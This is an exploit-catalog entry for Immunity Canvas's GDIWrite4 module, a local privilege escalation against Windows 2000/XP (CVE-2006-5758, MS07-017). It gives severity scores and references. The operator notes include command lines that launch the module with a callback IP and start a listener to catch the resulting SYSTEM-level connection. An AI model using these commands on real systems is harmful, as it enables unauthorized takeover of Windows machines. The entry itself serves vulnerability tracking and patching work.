
Immunity Canvas: GDIWRITE4

2006-11-06 20:07:00
Source: Immunity Canvas (exploitlist.immunityinc.com)

CVSS2: 7.2 High (AV:L/AC:L/Au:N/C:C/I:C/A:C)
  Access Vector: LOCAL
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE

EPSS: 0.0005 Low (percentile 14.4%)

Name: GDIWrite4
CVE: CVE-2006-5758
Exploit Pack
VENDOR: Microsoft
Notes:

This exploit will auto-target based on reading a kernel file on Windows 2000
or XP. It will generate a target fingerprint when you run the auto-targeter;
this is useful when you don't have read access to the kernel files and still want
to run the exploit. If it succeeds, it will leave a SYSTEM token as your current token.

#example commandline usage on Windows 2000 SP4 English
#we set our callback IP to 10.10.10.6 in the test lab
runmodule GDIWrite4 -l 10.10.10.6 -d 5555

Make sure you have a listener listening already before you run the above
command.
./commandlineInterface -v 1 -p 5555

If you get the wrong version (-v 1 on an XP box, say), you'll see a PAGE FAULT
IN NON PAGED AREA bluescreen.

On XP this was fixed with KB925902

MSRC: http://www.microsoft.com/technet/security/Bulletin/ms07-017.mspx
MSADV: MS07-017
Date public: 11/06/2006
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5758
CVSS: 7.2
